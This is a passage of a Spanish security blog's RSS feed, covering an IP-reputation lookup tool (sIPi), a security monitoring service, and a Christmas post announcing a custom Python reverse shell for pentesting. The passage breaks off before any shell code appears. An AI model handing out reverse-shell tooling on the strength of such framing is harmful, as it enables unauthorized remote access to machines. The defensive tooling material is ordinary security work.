IPS&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;A priori no se sabe si es lícito o no, para resolver el misterio se puede consultar la información sobre la lista de direcciones IP origen, en alguna de las múltiples fuentes de información / blacklist (véase las principales fuentes de &lt;b&gt;información sobre reputación y actividad &lt;/b&gt;de las IP en Internet):&lt;/div&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;The Top Cyber Threat Intelligence Feeds&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://alienvault.com/&quot;&gt;AlienVault.com&lt;/a&gt;: Multiple sources including large honeynets that profile adversaries.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://crowdstrike.com/&quot;&gt;CrowdStrike.com&lt;/a&gt;: Advanced threat intel as part of their threat protection platform.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://cyveilance.com/&quot;&gt;Cyveilance.com&lt;/a&gt;: Unique feeds on threat actors: indications of criminal intent.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://emergingthreats.net/&quot;&gt;EmergingThreats.net&lt;/a&gt;:  A variety of feeds.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://fireeye.com/&quot;&gt;FireEye.com&lt;/a&gt;: DTI- Dynamic Threat Intelligence service.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://hacksurfer.com/&quot;&gt;H&lt;/a&gt;&lt;a href=&quot;http://hacksurfer.com/&quot;&gt;ackSurfer.com&lt;/a&gt; (SurfWatch): Insights tailored to your business.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://hexiscyber.com/&quot;&gt;HexisCyber.com&lt;/a&gt;: Feed supports automated actions.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://internetidentity.com/&quot;&gt;InternetIdentity.com&lt;/a&gt;: Threat feeds from their big data solution ActiveTrust.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://isightpartners.com/&quot;&gt;iSightPartners.com&lt;/a&gt;: ThreatScape series.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://lookingglass.com/&quot;&gt;LookingGlass.com&lt;/a&gt;: Maps of infrastructure, connectivity and ownership, plus threat intel.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://malwarecheck.org/&quot;&gt;MalwareCheck.org&lt;/a&gt;: Intelligence on any URL&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://malwaredomains.com/&quot;&gt;MalwareDomains.com&lt;/a&gt;:  A list of domains known to be associated with malware.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://thecyberthreat.com/cyber-threat-intelligence-feeds/RedSkyAlliance.com&quot;&gt;RedSkyAlliance.com&lt;/a&gt;: A vetted team of corporate computer incident responders and security professionals.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://recordedfuture.com/&quot;&gt;RecordedFuture.com&lt;/a&gt;: Organizes information from the Internet.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://secureworks.com/&quot;&gt;SecureWorks.com&lt;/a&gt;: Provides feeds and also instruments networks.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://symantec.com/&quot;&gt;Symantec.com&lt;/a&gt;: DeepInsight feeds on a variety of topics including reputation.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://team-cymru.com/&quot;&gt;Team-Cymru.com&lt;/a&gt;: Threat intelligence plus bogon lists.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://twitter.com/thecyberthreat&quot;&gt;TheCyberThreat&lt;/a&gt;: Our Twitter feed. High level but comprehensive and curated.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://threatconnect.com/&quot;&gt;ThreatConnect.com&lt;/a&gt;: by Cyber Squared. Focused on information sharing.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://threatgrid.com/&quot;&gt;ThreatGrid.com&lt;/a&gt;: Unified malware analysis. Now part of Cisco.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://threatintelligencereview.com/&quot;&gt;ThreatIntelligenceReview.com:&lt;/a&gt; Updated reviews of threat intelligence sources.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://threatstop.com/&quot;&gt;ThreatStop.com&lt;/a&gt;: Block Botnets by IP  reputation.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://threatstream.com/&quot;&gt;ThreatStream.com&lt;/a&gt;: Famous team. Multiple sources in interoperable platform.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://threattrack.com/&quot;&gt;ThreatTrack.com&lt;/a&gt;:  Stream of malicious URLs,IPs and malware/phishing related data.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://verisigninc.com/&quot;&gt;Verisigninc.com&lt;/a&gt;: iDefense feeds highly regarded by some key institutions.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Comprobar todas y cada una de ellas, puede ser un proceso lento y muy tedioso. Recientemente ha nacido un proyecto que unifica en solo portal toda la información sobre reputación, actividad maliciosa y comportamiento de las direcciones IP reportados por las múltiples fuentes de información con objeto de generar una base de datos de conocimiento única donde con una sola consulta se pueda conocer si una dirección IP esta considerada &quot;una amenaza&quot; real o sin embargo esta considerada como una amenza potencial.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Estoy hablando del proyecto http://cymon.io&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-uPLo4u57osM/Vv4mvTsgFSI/AAAAAAAAd5w/7Ucn6yu0LCQ4bFiC9EvPlgIymk4lyYgeA/s1600/ST2_CYMON.io.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;190&quot; src=&quot;https://3.bp.blogspot.com/-uPLo4u57osM/Vv4mvTsgFSI/AAAAAAAAd5w/7Ucn6yu0LCQ4bFiC9EvPlgIymk4lyYgeA/s640/ST2_CYMON.io.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Una consulta en la web, permite analizar la información de la dirección IP en múltiples fuentes de información, lo que permite ahorrar tiempo en dicho análisis. Este proyecto además cuenta con una API de desarrollo que permite automatizar el proceso.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Como ya se anunciaba en nuestro &lt;a href=&quot;http://www.seguridadparatodos.es/2016/03/svtcloud-monitoring-security-operations.html&quot; target=&quot;_blank&quot;&gt;anterior artículo&lt;/a&gt;, el departamento MSOC (&lt;a href=&quot;http://www.seguridadparatodos.es/2016/03/svtcloud-monitoring-security-operations.html&quot; target=&quot;_blank&quot;&gt;Monitoring &amp;amp; CyberSOC&lt;/a&gt;) de www.svtcloud.com ha desarrollado una herramienta [&lt;b&gt;&lt;a href=&quot;https://github.com/ST2Labs/SIPI&quot; target=&quot;_blank&quot;&gt;sIPi&lt;/a&gt;&lt;/b&gt;] que aprovecha esta API de consulta, para automatizar el proceso de obtención de información relacionada con una lista de direcciones IP. Se puede consultar 1000 direcciones IP/día, de forma totalmente gratuita.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;[!] Simple IP Information Tools [SIPI]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;sIPi (Simple IP Information Tools), así os como se ha bautizado a esta pequeña herramienta que en su versión 0.1, permite:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li style=&quot;text-align: justify;&quot;&gt;Analizar la reputación de la dirección IP [actividad malware, botnet, spam, dnsrbl, blacklist, etc] consultando las fuente Cymon.io&lt;/li&gt;&lt;li style=&quot;text-align: justify;&quot;&gt;Nivel de exposición de las direcciones IP utilizando el motor SHODAN.io&lt;/li&gt;&lt;li style=&quot;text-align: justify;&quot;&gt;Información de geolocalización básica de la IP utilizando IPInfo.io&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Con esta utilidad se ha unificado en una sola herramienta la consulta de &quot;IP Reputation data &amp;amp; IP Service exposure risk&quot;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En esta primera versión 0.1, se puede analizar una sola IP o una lista de IP&#39;s, donde se puede consultar por una categoría [botnet, spam, malware, phishing, blacklist] o todas, así como añadir información sobre SHODAN.io o simplemente información sencilla de geolocalización.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Más información y ejemplos se pueden encontrar aquí:&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;// GET it NOW //&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;https://github.com/ST2Labs/SIPI&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-KUsB3hQnZzA/VuqGklMvB6I/AAAAAAAAd4o/O-05sd3fp84cquMZYBFsOfhI2LjqIJkFQ/s1600/SVTCloud_ST2Labs_sIPi_tools.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;420&quot; src=&quot;https://1.bp.blogspot.com/-KUsB3hQnZzA/VuqGklMvB6I/AAAAAAAAd4o/O-05sd3fp84cquMZYBFsOfhI2LjqIJkFQ/s640/SVTCloud_ST2Labs_sIPi_tools.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;#ST2Labs&lt;br /&gt;#SVTCloudSecurity&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: &#39;Helvetica Neue&#39;, Helvetica, &#39;Segoe UI&#39;, Arial, freesans, sans-serif, &#39;Apple Color Emoji&#39;, &#39;Segoe UI Emoji&#39;, &#39;Segoe UI Symbol&#39;; font-size: 16px; line-height: 25.6px;&quot;&gt;This tool is aimed for Incident Response Team and anyone what&#39;s want to know the behaviour of the &quot;suspicious&quot; IP Address. The tools do search looking for reputation info from a set of open threat intelligence sources. Information about this IP like malware activity, malicious activity, blacklist, spam and botnet activity.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;IP Reputation Data &amp;amp; IP Risk Level Exposure&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2016/04/sipi-simple-ip-information-tool-is-out.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-1j617JgrY10/Vv6FX7c1sjI/AAAAAAAAd6c/UTtld4lMOL0GF8IQ3nCA95Ip2E9JuhEXg/s72-c/ST2_SIPI_Head.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-3979370011785388486</guid><pubDate>Thu, 17 Mar 2016 10:30:00 +0000</pubDate><atom:updated>2016-03-17T11:30:22.366+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Alerta</category><category domain="http://www.blogger.com/atom/ns#">FaaS</category><category domain="http://www.blogger.com/atom/ns#">Gestión</category><category domain="http://www.blogger.com/atom/ns#">Incidencias</category><category domain="http://www.blogger.com/atom/ns#">Incident</category><category domain="http://www.blogger.com/atom/ns#">Monitorización</category><category domain="http://www.blogger.com/atom/ns#">MSOC</category><category domain="http://www.blogger.com/atom/ns#">NOC</category><category domain="http://www.blogger.com/atom/ns#">SOC</category><title>SVTCloud Monitoring &amp; Security Operations Center (MSOC)</title><description>&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-tljyAapJyfo/Vup80GKuJyI/AAAAAAAAd4U/HzXGszLGmU47O_VXi3D-t6qEcVY_eAa6A/s1600/SVTCloud_presentacion.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;260&quot; src=&quot;https://1.bp.blogspot.com/-tljyAapJyfo/Vup80GKuJyI/AAAAAAAAd4U/HzXGszLGmU47O_VXi3D-t6qEcVY_eAa6A/s640/SVTCloud_presentacion.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Presentación&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;Desde el pasado mes de Febrero, tengo el placer de trabajar en &lt;/span&gt;&lt;a href=&quot;https://twitter.com/svtcloud&quot; style=&quot;text-align: justify;&quot; target=&quot;_blank&quot;&gt;@SVTCloud&lt;/a&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;(&lt;/span&gt;&lt;a href=&quot;http://www.svtcloud.com/&quot; style=&quot;text-align: justify;&quot;&gt;www.svtcloud.com&lt;/a&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;) como el responsable del servicio y departamento de Monitorización y Operaciones de Seguridad (MSOC).&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Entre otros, el equipo de Seguridad del MSOC, ofrece los servicios:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;-&lt;b&gt; PSaaS - Perimetral Security as a Service&lt;/b&gt;, que consiste en la gestión operativa de dispositivos de seguridad perimetral en modo servicio.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;- &lt;b&gt;Alerta Temprana&lt;/b&gt;: realizando una monitorización constante 24x7, del estado de la seguridad.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;- &lt;b&gt;Respuesta ante incidentes:&lt;/b&gt; investigación y propuestas de contramedidas que permitan contener el incidente de seguridad, y proporcionar las bases de seguridad para prevenir en el futuro.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Por supuesto, la monitorización constante, nos permite detectar nuevos ataques, alertar y prevenir ataques e investigar con objeto de establecer líneas de defensa en los dispositivos perimetrales.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Una de las tareas más recurrentes en la detección de un ataque es conocer si el tráfico sospechoso con origen y/o destino desconocido (dirección IP) esta incluido relacionado con actividad maliciosa, SPAM, Malware, etc... fruto de nuestro trabajo diario, he desarrollado &lt;b&gt;sIPi&lt;/b&gt; una herramienta que permite analizar una dirección IP o lista de direcciones IP, para obtener información relevante con respecto a:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- &lt;b&gt;Nivel de reputación / actividad asociada a dicha IP&lt;/b&gt;: es decir, analizar si la IP esta involucrada en SPAM, actividad Malware y/o pertenece a una red Botnet. Utilizando el servicio ofrecido por http://cymon.io&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- &lt;b&gt;Nivel de exposición&lt;/b&gt;: analizar la IP y conocer cuál es su nivel de exposición en Internet, a través del buscador http://shodan.io&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- &lt;b&gt;Información básica de geolocalización&lt;/b&gt;: analizar la información de la IP, obteniendo información simple de la misma, a través de http://ipinfo.io&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;sIPi - Simple IP Information Tools&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;La herramienta integra en una sola consulta la información que se obtendría por separado, consultando en cada una de las fuentes de información.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En breve publicaré la herramienta en mi GitHub (https://github.com/st2labs) estad atentos !!!&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Os dejo una captura:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-KUsB3hQnZzA/VuqGklMvB6I/AAAAAAAAd4k/wN_gJgUKOK4B8kP-jLdgnOXP5ynKgUNSg/s1600/SVTCloud_ST2Labs_sIPi_tools.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;421&quot; src=&quot;https://3.bp.blogspot.com/-KUsB3hQnZzA/VuqGklMvB6I/AAAAAAAAd4k/wN_gJgUKOK4B8kP-jLdgnOXP5ynKgUNSg/s640/SVTCloud_ST2Labs_sIPi_tools.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;[@St2labs | @Svtcloud] - sIPi Tools output&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Pronto en mi https://github.com/st2labs&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;#ST2Labs&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;#SVTCloud&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;www.st2labs.com / www.svtcloud.com&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;</description><link>http://www.seguridadparatodos.es/2016/03/svtcloud-monitoring-security-operations.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-tljyAapJyfo/Vup80GKuJyI/AAAAAAAAd4U/HzXGszLGmU47O_VXi3D-t6qEcVY_eAa6A/s72-c/SVTCloud_presentacion.png" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-4662743875355564703</guid><pubDate>Wed, 23 Dec 2015 09:50:00 +0000</pubDate><atom:updated>2015-12-23T11:00:06.548+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">2015</category><category domain="http://www.blogger.com/atom/ns#">Base64</category><category domain="http://www.blogger.com/atom/ns#">Code</category><category domain="http://www.blogger.com/atom/ns#">Python</category><category domain="http://www.blogger.com/atom/ns#">Reverse</category><category domain="http://www.blogger.com/atom/ns#">Shell</category><category domain="http://www.blogger.com/atom/ns#">ST2Blog</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">XMas</category><title>Feliz Navidad with Custom Python Reverse Shell</title><description>&lt;a href=&quot;http://1.bp.blogspot.com/-qLr8Bdkb_B4/VnpsLAggJaI/AAAAAAAAd1o/zBuP7pkvJf4/s1600/Feliz_Navidad.png&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-qLr8Bdkb_B4/VnpsLAggJaI/AAAAAAAAd1o/zBuP7pkvJf4/s1600/Feliz_Navidad.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Este año es mi &lt;b&gt;quinta (5) Navidad con vosotros,&lt;/b&gt; parece que fuera ayer (25/Dic 2011) cuando celebré la primera Navidad con todos vosotros, el camino recorrido hasta ahora ha sido gratificante y emocionante, pero quizás lo es aún más el camino que queda por recorrer.&lt;br /&gt;&lt;br /&gt;Como es habitual, la intensidad con la que publico artículos se encuentra supeditada a la vida misma (y a los deseos de mi pequeña xD), el pasado 2014, se me olvido felicitar la Navidad, por lo que este año me ha parecido que la mejor forma de celebrarlo con vosotros es compartiendo el código de una shell reversa escrita en python ... que puede resultar de gran utilidad durante una Auditoria / Pentesting.&lt;br /&gt;&lt;br /&gt;Muchas Gracias a todos por seguirme y leer mis publicaciones, no vemos el año próximo. Feliz Navidad con mis mejores deseos para el año que viene.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Custom Python Reverse Shell&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Code&lt;span style=&quot;font-size: x-small;&quot;&gt;*&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-collapse: collapse; border-radius: 0px !important; border-spacing: 0px; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: #0a0a0a; direction: ltr !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 15px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; max-width: 100%; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; table-layout: auto !important; top: auto !important; vertical-align: baseline !important; width: 1170px;&quot;&gt;&lt;tbody style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;&lt;tr style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;&lt;td class=&quot;gutter&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;&lt;div class=&quot;line number1 index0 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;line number2 index1 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;line number3 index2 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;line number4 index3 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: 